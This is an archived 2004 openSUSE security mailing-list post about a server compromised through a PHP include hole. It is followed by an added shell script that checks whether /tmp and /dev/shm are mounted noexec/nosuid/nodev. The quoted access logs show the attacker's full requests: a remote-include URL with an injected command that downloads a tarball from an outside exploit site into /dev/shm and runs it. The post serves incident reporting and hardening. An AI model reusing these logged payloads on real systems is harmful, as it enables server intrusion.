Mailinglist Archive: opensuse-security (145 mails)

/dev/shm (in)security / php-based attack
  • From: Olivier Mueller <om-lists-suse-security@xxxxxx>
  • Date: Sat, 06 Nov 2004 00:47:39 +0100
  • Message-id: <1099698459.1712.14.camel@xxxxxxxxxxxxxxxxx>
Hello,

One of the servers I'm co-administering just got attacked
a few days ago. The cracker managed to start a shell on
the server by using one of these php-nuke-like include
holes lying in old php scripts. Until now it failed
because most of these scripts were working with /tmp,
and the /tmp on that server was mounted with noexec+nosuid.

But this time /dev/shm was used: is this "new" filesystem
really necessary, and what for? Would you keep it, or
rather shut it down completely? At least I'd like to
have it also mounted in nosuid/noexec mode... I'll check
in the boot scripts how to do that, but in the meantime
if you have suggestions, you're welcome :)

Webserver logs when the attack occurred (the aleks-exploits
pages still seem to be active: you can get some interesting
files from there, like exploits against linux kernel,
irc bots, and other "goodies"):

212.110.91.36 - - [30/Oct/2004:18:03:29 +0200]
"GET /guestbook/include/livre_include.php?no_connect=lol&
chem_absolu=http://www.aleks-exploits.com/own.txt?&cmd=cd%20/dev/shm;
wget%20www.aleks-exploits.com/amech.tgz;tar%20zxvf%20amech.tgz;cd%
20.amech;./sh HTTP/1.1" 200 3189 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows 98)"

212.110.91.36 - - [30/Oct/2004:18:03:49 +0200]
"GET /guestbook/include/livre_include.php?no_connect=lol&
chem_absolu=http://www.aleks-exploits.com/own.txt?&cmd=cd%20/dev/shm;
wget%20www.aleks-exploits.com/a.tgz;tar%20zxvf%20a.tgz;./a HTTP/1.1" 200
2894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


Regards,
Olivier
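The post asks how to get /dev/shm mounted nosuid/noexec the way /tmp already is. The script below is an added example, not code from the original message or from SUSE: it reads a file in /proc/mounts format, reports which of noexec, nosuid and nodev a given mount point lacks, and prints the remount command and the /etc/fstab line that would add them. The sample mounts table is constructed here to match the situation described in the post (/tmp hardened, /dev/shm not); the filesystem type "tmpfs" for /dev/shm is an assumption, older systems show it as "shm".

```shell
#!/bin/sh
# Added example (not part of the original post): audit mount options of
# world-writable scratch filesystems such as /tmp and /dev/shm, and show
# how to add noexec/nosuid/nodev. Operates on a /proc/mounts-style file so
# it can run offline against a constructed sample.

# missing_opts MOUNTS_FILE MOUNTPOINT
# Prints the hardening options (noexec, nosuid, nodev) that MOUNTPOINT
# lacks in MOUNTS_FILE, one per line; prints nothing when all are set.
# Returns 1 when the mount point does not appear in the file at all.
missing_opts() {
    mounts_file=$1
    mp=$2
    # Field 2 is the mount point, field 4 the comma-separated options.
    # If a path is mounted more than once, the last entry is the visible one.
    opts=$(awk -v mp="$mp" '$2 == mp { print $4 }' "$mounts_file" | tail -n 1)
    [ -n "$opts" ] || return 1
    for want in noexec nosuid nodev; do
        case ",$opts," in
            *",$want,"*) ;;          # option already present
            *) echo "$want" ;;
        esac
    done
    return 0
}

# harden_cmd MOUNTPOINT
# Line 1: remount command that applies the options immediately.
# Line 2: /etc/fstab entry that makes them survive a reboot (tmpfs assumed).
harden_cmd() {
    mp=$1
    echo "mount -o remount,noexec,nosuid,nodev $mp"
    echo "tmpfs $mp tmpfs defaults,noexec,nosuid,nodev 0 0"
}

# Constructed sample in /proc/mounts format, mirroring the post:
# /tmp carries noexec+nosuid, /dev/shm is mounted with plain rw.
SAMPLE_MOUNTS=$(mktemp)
cat >"$SAMPLE_MOUNTS" <<'EOF'
/dev/sda2 / reiserfs rw 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid 0 0
tmpfs /dev/shm tmpfs rw 0 0
EOF

for mp in /tmp /dev/shm; do
    if lacking=$(missing_opts "$SAMPLE_MOUNTS" "$mp"); then
        if [ -z "$lacking" ]; then
            echo "$mp: ok"
        else
            echo "$mp: missing$(printf ' %s' $lacking)"
            harden_cmd "$mp" | sed 's/^/    /'
        fi
    else
        echo "$mp: not mounted"
    fi
done
rm -f "$SAMPLE_MOUNTS"
```

Two caveats worth keeping in mind: the options only stop direct execution of files on that filesystem, so `sh /dev/shm/.amech/sh` or `perl /dev/shm/a.pl` still runs an interpreter over a noexec file, and the wget-and-run step in the logged requests already works that way for scripts. The mount options raise the bar for dropped binaries; they do nothing about the include hole itself, which is what lets the attacker run `cd`, `wget` and `tar` in the first place.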


